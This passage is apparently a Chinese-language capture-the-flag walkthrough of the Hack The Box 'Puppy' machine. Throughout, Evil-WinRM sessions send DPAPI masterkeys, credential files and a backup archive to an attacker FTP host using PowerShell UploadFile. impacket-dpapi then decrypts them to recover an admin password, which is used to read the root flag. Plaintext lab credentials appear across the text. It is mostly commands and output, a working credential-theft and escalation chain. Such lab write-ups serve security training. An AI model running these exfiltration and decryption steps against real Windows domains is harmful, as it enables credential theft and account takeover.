   - Creating active users list...
  [X] Exception: System.NullReferenceException: Object reference not set to an instance of an object.
   at cc.a(Boolean A_0, Boolean A_1, Boolean A_2, Boolean A_3, Boolean A_4)                                                                                
   - Creating disabled users list...
  [X] Exception: System.NullReferenceException: Object reference not set to an instance of an object.
   at cc.a(Boolean A_0, Boolean A_1, Boolean A_2, Boolean A_3, Boolean A_4)                                                                                
   - Admin users list...
  [X] Exception: System.NullReferenceException: Object reference not set to an instance of an object.
   at cc.a(Boolean A_0, Boolean A_1, Boolean A_2, Boolean A_3, Boolean A_4)                                                                                

             *((,.,/((((((((((((((((((((/,  */                                                                                                             
      ,/*,..*((((((((((((((((((((((((((((((((((,                                                                                                           
    ,*/((((((((((((((((((/,  .*//((//**, .*(((((((*                                                                                                        
    ((((((((((((((((**********/########## .(* ,(((((((                                                                                                     
    (((((((((((/********************/####### .(. (((((((                                                                                                   
    ((((((..******************/@@@@@/***/###### ./(((((((                                                                                                  
    ,,....********************@@@@@@@@@@(***,#### .//((((((                                                                                                
    , ,..********************/@@@@@%@@@@/********##((/ /((((                         

…..

ÉÍÍÍÍÍÍÍÍÍ͹ Searching hidden files or folders in C:\Users home (can be slow)
                                                                                                                                                           
     C:\Users\adam.silver\Desktop\DFBE70A7E5CC19A398EBF1B96859CE5D
     C:\Users\Default User
     C:\Users\Default
     C:\Users\All Users
     C:\Users\Default
     C:\Users\All Users
     C:\Users\All Users\ntuser.pol

DPAPI泄露,破解masterkey

发现了C:\Users\adam.silver\Desktop\DFBE70A7E5CC19A398EBF1B96859CE5D这一种隐藏文件

Get-ChildItem -Hidden C:\Users\adam.silver\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem C:\Users\adam.silver\AppData\Roaming\Microsoft\Protect\
Get-ChildItem C:\Users\adam.silver\AppData\Local\Microsoft\Protect\
Get-ChildItem -Hidden C:\Users\adam.silver\AppData\Roaming\Microsoft\Protect\
Get-ChildItem -Hidden C:\Users\adam.silver\AppData\Local\Microsoft\Protect\
Get-ChildItem -Hidden C:\Users\adam.silver\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1105
Get-ChildItem -Hidden C:\Users\adam.silver\AppData\Local\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1105

*Evil-WinRM* PS C:\Users\adam.silver\desktop> Get-ChildItem -Hidden C:\Users\adam.silver\AppData\Roaming\Microsoft\Credentials\
*Evil-WinRM* PS C:\Users\adam.silver\desktop> Get-ChildItem C:\Users\adam.silver\AppData\Roaming\Microsoft\Protect\


    Directory: C:\Users\adam.silver\AppData\Roaming\Microsoft\Protect


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d---s-         2/28/2025  12:31 PM                S-1-5-21-1487982659-1829050783-2281216199-1105


*Evil-WinRM* PS C:\Users\adam.silver\desktop> Get-ChildItem C:\Users\adam.silver\AppData\Local\Microsoft\Protect\
Cannot find path 'C:\Users\adam.silver\AppData\Local\Microsoft\Protect\' because it does not exist.
At line:1 char:1
+ Get-ChildItem C:\Users\adam.silver\AppData\Local\Microsoft\Protect\
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (C:\Users\adam.s...rosoft\Protect\:String) [Get-ChildItem], ItemNotFoundException
    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand
*Evil-WinRM* PS C:\Users\adam.silver\desktop> Get-ChildItem -Hidden C:\Users\adam.silver\AppData\Roaming\Microsoft\Protect\
 


    Directory: C:\Users\adam.silver\AppData\Roaming\Microsoft\Protect


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a-hs-         2/28/2025  12:31 PM             24 CREDHIST
-a-hs-         2/28/2025  12:31 PM             76 SYNCHIST


*Evil-WinRM* PS C:\Users\adam.silver\desktop> Get-ChildItem -Hidden C:\Users\adam.silver\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1105


    Directory: C:\Users\adam.silver\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1105


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a-hs-         2/28/2025  12:31 PM            740 1038bdea-4935-41a8-a224-9b3720193c86
-a-hs-         2/28/2025  12:31 PM            896 BK-PUPPY
-a-hs-         2/28/2025  12:31 PM             24 Preferred


*Evil-WinRM* PS C:\Users\adam.silver\desktop> 

成功找到了 adam.silver 用户的 DPAPI 主密钥文件。

*Evil-WinRM* PS C:\Users\adam.silver> (New-Object Net.WebClient).UploadFile('ftp://10.10.14.41/incoming/1038bdea-4935-41a8-a224-9b3720193c86', 'C:\Users\adam.silver\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1105\1038bdea-4935-41a8-a224-9b3720193c86')

*Evil-WinRM* PS C:\Users\adam.silver\Documents> (New-Object Net.WebClient).UploadFile('ftp://10.10.14.41/incoming/DFBE70A7E5CC19A398EBF1B96859CE5D-DESKTOP', 'C:\Users\adam.silver\Desktop\DFBE70A7E5CC19A398EBF1B96859CE5D')

*Evil-WinRM* PS C:\Users\adam.silver> (New-Object Net.WebClient).UploadFile('ftp://10.10.14.41/incoming/BK-PUPPY', 'C:\Users\adam.silver\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1105\BK-PUPPY')

*Evil-WinRM* PS C:\Users\adam.silver> (New-Object Net.WebClient).UploadFile('ftp://10.10.14.41/incoming/Preferred', 'C:\Users\adam.silver\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1105\Preferred')

*Evil-WinRM* PS C:\Users\adam.silver> (New-Object Net.WebClient).UploadFile('ftp://10.10.14.41/incoming/DFBE70A7E5CC19A398EBF1B96859CE5D','C:\Users\adam.silver\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D')

*Evil-WinRM* PS C:\Users\adam.silver> (New-Object Net.WebClient).UploadFile('ftp://10.10.14.41/incoming/CREDHIST', 'C:\Users\adam.silver\AppData\Roaming\Microsoft\Protect\CREDHIST')

*Evil-WinRM* PS C:\Users\adam.silver> (New-Object Net.WebClient).UploadFile('ftp://10.10.14.41/incoming/SYNCHIST', 'C:\Users\adam.silver\AppData\Roaming\Microsoft\Protect\SYNCHIST')

*Evil-WinRM* PS C:\Users\adam.silver> 

copy下来后解一下DPAPI

┌──(root㉿kali)-[/srv/ftp/incoming]
└─# impacket-dpapi masterkey -t puppy.htb/adam.silver:'Password@987'@10.10.11.70 -file 1038bdea-4935-41a8-a224-9b3720193c86    

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[MASTERKEYFILE]
Version     :        2 (2)
Guid        : 1038bdea-4935-41a8-a224-9b3720193c86
Flags       :        0 (0)
Policy      :        0 (0)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)

Decrypted key using rpc call
Decrypted key: 0x67c93a5831a5d17bae13deb6ef3324f5c97abd363d8f146f5ac79f07fb2b2c0eb21433fcf211c15af4e79c1c72a512d3c8f181433b1fa50e78e7e146c27230ae

拿到了adam.silver 用户的明文 DPAPI 主密钥,接下来去桌面发现的DPAPI文件，和CREDHIST文件加密文件

┌──(root㉿kali)-[/srv/ftp/incoming]
└─# impacket-dpapi credential -file DFBE70A7E5CC19A398EBF1B96859CE5D-DESKTOP -key '0x67c93a5831a5d17bae13deb6ef3324f5c97abd363d8f146f5ac79f07fb2b2c0eb21433fcf211c15af4e79c1c72a512d3c8f181433b1fa50e78e7e146c27230ae'


Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[CREDENTIAL]
LastWritten : 2025-02-28 20:31:23
Flags       : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist     : 0x00000002 (CRED_PERSIST_LOCAL_MACHINE)
Type        : 0x00000001 (CRED_TYPE_GENERIC)
Target      : WindowsLive:target=virtualapp/didlogical
Description : PersistedCredential
Unknown     : 
Username    : 02pjquuelmoskags
Unknown     : 

KeyWord : Microsoft_WindowsLive:authstate:0
Data    : 
 0000   01 00 00 00 D0 8C 9D DF  01 15 D1 11 8C 7A 00 C0   .............z..
 0010   4F C2 97 EB 01 00 00 00  B6 88 C3 E7 CB 39 31 48   O............91H
 0020   B2 D8 A2 43 4E 14 C2 F4  00 00 00 00 02 00 00 00   ...CN...........
 0030   00 00 10 66 00 00 00 01  00 00 20 00 00 00 AD 11   ...f...... .....
 0040   01 2D 5F 16 26 ED 21 21  B2 5B 69 94 4F 4C 18 98   .-_.&.!!.[i.OL..
 0050   A4 8F B8 2C 6F 04 A3 E9  B7 16 FE C3 24 06 00 00   ...,o.......$...
 0060   00 00 0E 80 00 00 00 02  00 00 20 00 00 00 A6 BE   .......... .....
 0070   8A 4F D7 AE 5B 64 61 F1  6E A4 34 59 E5 6E D8 91   .O..[da.n.4Y.n..
 0080   9D 61 5D C8 AA 44 B5 34  95 CF 1C BE 93 B2 90 1E   .a]..D.4........
 0090   00 00 8E 0A 17 56 03 8B  3E A2 60 68 B2 3B 30 B9   .....V..>.`h.;0.
 00a0   9E F0 18 5A 0A FC 60 85  24 03 C6 BA F0 54 94 AC   ...Z..`.$....T..
 00b0   F5 93 29 47 15 4B 12 07  27 C4 C8 1C D0 D1 6A 3A   ..)G.K..'.....j:
 00c0   3C F8 D1 43 58 ED C2 DB  3A 17 07 95 A0 A0 30 89   <..CX...:.....0.
 00d0   44 F0 BF 74 A2 27 11 EF  E3 20 3E B0 2E 4D 6F 74   D..t.'... >..Mot
 00e0   FC 17 26 20 FD 80 3C 01  AD 5A A7 E9 C0 E0 9F C1   ..& ..<..Z......
 00f0   D3 63 4E 36 B0 75 25 6C  8D ED 98 AD 5F 9C C7 D8   .cN6.u%l...._...
KeyWord : Microsoft_WindowsLive:authstate:1
Data    : 
 0000   DF EE D6 87 77 32 4D EC  8A 4A 56 65 55 23 14 C2   ....w2M..JVeU#..
 0010   C8 2F 4F 7D 35 27 61 B3  03 60 65 AD 0A 99 E9 37   ./O}5'a..`e....7
 0020   E5 5C 04 B2 FC 72 1F B0  6F 8F E8 8B A2 D6 53 06   .\...r..o.....S.
 0030   2E 05 21 D2 9C 2F CE 47  E8 34 55 B7 54 19 53 0A   ..!../.G.4U.T.S.
 0040   12 FE 39 1C BA 9E C4 48  55 6A B8 79 50 B6 B1 88   ..9....HUj.yP...
 0050   24 B0 4F 42 2F B0 38 98  C1 B0 6F FC 7F C0 86 FD   $.OB/.8...o.....
 0060   49 45 8C 04 7E DB 74 62  4C 3F EC 81 3D 39 A7 C3   IE..~.tbL?..=9..
 0070   D7 08 7E 7E 17 AD CE 81  9C AA BE 29 5A 8F AC 8A   ..~~.......)Z...
.........

┌──(root㉿kali)-[/srv/ftp/incoming]
└─# impacket-dpapi credential -file DFBE70A7E5CC19A398EBF1B96859CE5D -key '0x67c93a5831a5d17bae13deb6ef3324f5c97abd363d8f146f5ac79f07fb2b2c0eb21433fcf211c15af4e79c1c72a512d3c8f181433b1fa50e78e7e146c27230ae' 


Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[CREDENTIAL]
LastWritten : 2025-03-08 15:26:44
Flags       : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist     : 0x00000002 (CRED_PERSIST_LOCAL_MACHINE)
Type        : 0x00000001 (CRED_TYPE_GENERIC)
Target      : WindowsLive:target=virtualapp/didlogical
Description : PersistedCredential
Unknown     : 
Username    : 02pjquuelmoskags
Unknown     : 

KeyWord : Microsoft_WindowsLive:authstate:0
Data    : 
 0000   01 00 00 00 D0 8C 9D DF  01 15 D1 11 8C 7A 00 C0   .............z..
 0010   4F C2 97 EB 01 00 00 00  B6 88 C3 E7 CB 39 31 48   O............91H
 0020   B2 D8 A2 43 4E 14 C2 F4  00 00 00 00 02 00 00 00   ...CN...........
 0030   00 00 10 66 00 00 00 01  00 00 20 00 00 00 2A 4C   ...f...... ...*L
 0040   BC 96 1D 48 07 9A 8C BF  2D CF DB E4 10 68 AD 6A   ...H....-....h.j
 0050   65 85 D5 C8 77 36 31 D2  40 76 A0 7A 5D 94 00 00   e...w61.@v.z]...
 0060   00 00 0E 80 00 00 00 02  00 00 20 00 00 00 E3 8A   .......... .....
 0070   64 01 07 DE BC 90 3A E9  1D FB 4E D7 F8 01 5F 0F   d.....:...N..._.
 0080   F4 59 E9 B5 1C 9B E3 F3  58 8F 45 AA B8 C6 90 1E   .Y......X.E.....
 0090   00 00 16 87 3F 65 7E 4E  13 D2 70 80 38 46 BE B6   ....?e~N..p.8F..
 00a0   93 16 01 78 FA 73 3C C7  D8 BC FE D0 7A 34 A6 0A   ...x.s<.....z4..
 00b0   9D 7F F7 A1 8B 39 A1 B8  C3 91 97 2F 6B 2F D9 A3   .....9...../k/..
 00c0   1A C5 15 29 9F 4A CA 08  20 82 36 E4 BA A0 E5 CA   ...).J.. .6.....
 00d0   F8 09 0B 03 71 C1 F4 C0  1D B1 CF 47 97 02 C9 14   ....q......G....
 00e0   D5 9B 7A 9A 95 13 66 B5  40 FB 85 B7 94 07 31 03   ..z...f.@.....1.
 00f0   25 FD A5 C3 0A 3C 3C 7A  EA 12 69 DD 57 44 59 7A   %....<<z..i.WDYz
KeyWord : Microsoft_WindowsLive:authstate:1
Data    : 
 0000   5B 57 12 1B 52 63 BD 78  A1 BB AC 5C 38 76 21 4D   [W..Rc.x...\8v!M
 0010   15 48 F0 7E 83 87 F7 3A  C0 08 18 8C D3 2D 06 FE   .H.~...:.....-..
 0020   D1 96 D1 F6 6C 91 05 90  78 3A 68 5E 01 86 41 71   ....l...x:h^..Aq
 0030   50 C0 45 75 A8 36 34 60  87 1F 63 80 A1 04 08 E0   P.Eu.64`..c.....
 0040   E6 59 A8 44 C0 52 9A 14  25 E4 23 D0 8A B0 F9 19   .Y.D.R..%.#.....
 0050   5F 99 11 4E 51 8F 23 9D  A6 EB 09 05 4D 72 27 00   _..NQ.#.....Mr'.
 0060   CC 7D 20 04 E5 6F 30 87  67 1F F1 41 DA D5 F7 39   .} ..o0.g..A...9
 0070   03 81 74 6C 49 74 56 4E  71 F2 F9 09 21 F5 7F 13   ..tlItVNq...!...
 0080   3A 06 1A E7 71 C0 54 6B  F3 4A 7D 64 04 3D 42 DB   :...q.Tk.J}d.=B.
 0090   86 11 15 C6 D0 80 B5 41  38 C2 FD 06 61 D1 30 AC   .......A8...a.0.
 00a0   30 C6 D8 A8 6E C0 82 88  88 25 E0 E1 7B 52 25 B0   0...n....%..{R%.
 00b0   2F 75 87 EC 64 46 03 9E  63 F6 CC 73 91 78 7A 7C   /u..dF..c..s.xz|
 00c0   E5 AB 76 A7 DE 68 A3 96  FA CF A8 FF 0A CF C1 9A   ..v..h..........
 00d0   D4 FA 91 A8 1D 10 87 E5  93 C2 8F 18 EB 1B 50 33   ..............P3
 00e0   72 9B A5 6C 30 98 05 FF  28 8D 9C 6D F8 B4 CD 7B   r..l0...(..m...{
 00f0   16 F1 06 8C 85 3C C9 55  4B 8F 67 4D C9 D1 30 17   .....<.UK.gM..0.
.........

还是一堆没有用的东西….

信息收集

我们继续翻一下目录

发现备份文件

我们copy下来看一下

*Evil-WinRM* PS C:\Users\adam.silver> (New-Object Net.WebClient).UploadFile('ftp://10.10.14.41/incoming/site-backup-2024-12-30.zip', 'C:\backups\site-backup-2024-12-30.zip')
*Evil-WinRM* PS C:\Users\adam.silver> (New-Object Net.WebClient).UploadFile('ftp://10.10.14.41/incoming/1.txt', 'C:\backups\1.txt')

发现之前分析的STEPH.COOPER@PUPPY.HTB用户的账密

DPAPI泄露,破解masterkey

登陆后和上面操作一样查询DPAPI

Get-ChildItem -Hidden C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107
Get-ChildItem C:\Users\steph.cooper\AppData\Local\Microsoft\Protect\
Get-ChildItem -Hidden C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\
Get-ChildItem -Hidden C:\Users\steph.cooper\AppData\Local\Microsoft\Protect\

*Evil-WinRM* PS C:\Users\steph.cooper\Documents> Get-ChildItem C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\


    Directory: C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d---s-         2/23/2025   2:36 PM                S-1-5-21-1487982659-1829050783-2281216199-1107


*Evil-WinRM* PS C:\Users\steph.cooper\Documents> Get-ChildItem -Hidden C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107


    Directory: C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a-hs-          3/8/2025   7:40 AM            740 556a2412-1275-4ccf-b721-e6a0b4f90407
-a-hs-         2/23/2025   2:36 PM             24 Preferred


*Evil-WinRM* PS C:\Users\steph.cooper\Documents> Get-ChildItem C:\Users\steph.cooper\AppData\Local\Microsoft\Protect\
Cannot find path 'C:\Users\steph.cooper\AppData\Local\Microsoft\Protect\' because it does not exist.
At line:1 char:1
+ Get-ChildItem C:\Users\steph.cooper\AppData\Local\Microsoft\Protect\
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (C:\Users\steph....rosoft\Protect\:String) [Get-ChildItem], ItemNotFoundException
    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand
*Evil-WinRM* PS C:\Users\steph.cooper\Documents> Get-ChildItem -Hidden C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials\


    Directory: C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a-hs-          3/8/2025   7:54 AM            414 C8D69EBE9A43E9DEBF6B5FBD48B521B9


*Evil-WinRM* PS C:\Users\steph.cooper\Documents> Get-ChildItem -Hidden C:\Users\steph.cooper\AppData\Local\Microsoft\Protect\
Cannot find path 'C:\Users\steph.cooper\AppData\Local\Microsoft\Protect\' because it does not exist.
At line:1 char:1
+ Get-ChildItem -Hidden C:\Users\steph.cooper\AppData\Local\Microsoft\P ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (C:\Users\steph....rosoft\Protect\:String) [Get-ChildItem], ItemNotFoundException
    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand
*Evil-WinRM* PS C:\Users\steph.cooper\Documents> 
*Evil-WinRM* PS C:\Users\steph.cooper\Documents> Get-ChildItem -Hidden C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\


    Directory: C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a-hs-          3/8/2025   7:40 AM             24 CREDHIST
-a-hs-          3/8/2025   7:40 AM             76 SYNCHIST

很明显还是有DPAPI破解的

copy下来进行破解

*Evil-WinRM* PS C:\Users\adam.silver> (New-Object Net.WebClient).UploadFile('ftp://10.10.14.41/incoming/556a2412-1275-4ccf-b721-e6a0b4f90407', 'C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107\556a2412-1275-4ccf-b721-e6a0b4f90407')

*Evil-WinRM* PS C:\Users\adam.silver\Documents> (New-Object Net.WebClient).UploadFile('ftp://10.10.14.41/incoming/C8D69EBE9A43E9DEBF6B5FBD48B521B9', 'C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials\C8D69EBE9A43E9DEBF6B5FBD48B521B9')

┌──(root㉿kali)-[/srv/ftp/incoming]
└─# impacket-dpapi masterkey -t puppy.htb/steph.cooper:'ChefSteph2025!'@10.10.11.70 -file 556a2412-1275-4ccf-b721-e6a0b4f90407
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[MASTERKEYFILE]
Version     :        2 (2)
Guid        : 556a2412-1275-4ccf-b721-e6a0b4f90407
Flags       :        0 (0)
Policy      : 4ccf1275 (1288639093)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)

Decrypted key using rpc call
Decrypted key: 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84
                                                                                                                                                           
┌──(root㉿kali)-[/srv/ftp/incoming]
└─# impacket-dpapi credential -file C8D69EBE9A43E9DEBF6B5FBD48B521B9 -key '0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84'


Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[CREDENTIAL]
LastWritten : 2025-03-08 15:54:29
Flags       : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist     : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type        : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)
Target      : Domain:target=PUPPY.HTB
Description : 
Unknown     : 
Username    : steph.cooper_adm
Unknown     : FivethChipOnItsWay2025!

得到steph.cooper_adm的密码其是admin组的直接可以去拿flag了

┌──(root㉿kali)-[/myift/bachang/htb/8/1]
└─# evil-winrm -i dc.puppy.htb -u steph.cooper_adm -p FivethChipOnItsWay2025!
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\steph.cooper_adm\Documents> cd ..

*Evil-WinRM* PS C:\Users\steph.cooper_adm\desktop> cd ..
*Evil-WinRM* PS C:\Users\steph.cooper_adm> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd desktop
*Evil-WinRM* PS C:\Users\Administrator\desktop> dir


    Directory: C:\Users\Administrator\desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---         7/26/2025   7:07 AM             34 root.txt


*Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt
d78af2****************************
*Evil-WinRM* PS C:\Users\Administrator\desktop>